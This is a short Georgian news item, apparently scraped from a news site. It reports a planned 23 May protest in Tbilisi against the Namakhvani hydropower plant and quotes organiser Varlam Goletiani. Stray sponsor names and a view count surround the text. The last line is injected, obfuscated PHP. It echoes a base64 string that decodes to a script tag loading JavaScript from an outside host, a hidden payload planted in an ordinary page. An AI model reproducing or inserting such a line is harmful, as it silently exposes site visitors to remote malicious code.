celsiusi
ავერსი საქკაბელი
“ნამახვანჰესის” მოწინააღმდეგე აქტივისტები საპროტესტო აქციას 23 მაისს, 14:00 საათზე, თბილისში, რესპუბლიკის მოედანზე გამართავენ. ამის შესახებ აქციის ორგანიზატორმა ვარლამ გოლეთიანმა განაცხადა.
 
მისივე თქმით, აქცია თვითორგანიზებით კეთდება და ადამიანები ემზადებიან რეგიონებიდან ჩამოსასვლელად და დასარჩენად.
 
“გრძელვადიანი ბრძოლისთვის არის კიდევ უფრო მეტი ადამიანი განწყობილი. 23-მა მაისმა უნდა თქვას თავისი სიტყვა ამ მიმართულებით, რომ ხელისუფლებამ დაინახოს, ჩვენი სიმრავლე ვერ იქნება დაძლევადი მისთვის ნაცადი ხერხით. ვგულისმობ შავ პიარ კამპანიას და ტალახის სროლას”, — განაცხადა ვარლამ გოლეთიანმა და აქტივისტებს მოუწოდა: “მოვემზადოთ გრძელვადიანი ბრძოლისთვის”.
 
შეგახსენებთ , რომ "ნამოხვანჰესის" მშენებლობის საწინააღმდეგო აქციის მონაწილეებმა, ხელისუფლებას დიალოგის კონსტრუქციულ რეჟიმში გასაგრძელებლად, რამდენიმე მოთხოვნა წაუყენეს. მას შემდეგ კი, რაც ხელისუფლებისგან სათანადო პასუხი ვერ მიიღეს, საქართველოს მასშტაბით აქციები დაანონსეს. 
 
1282
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");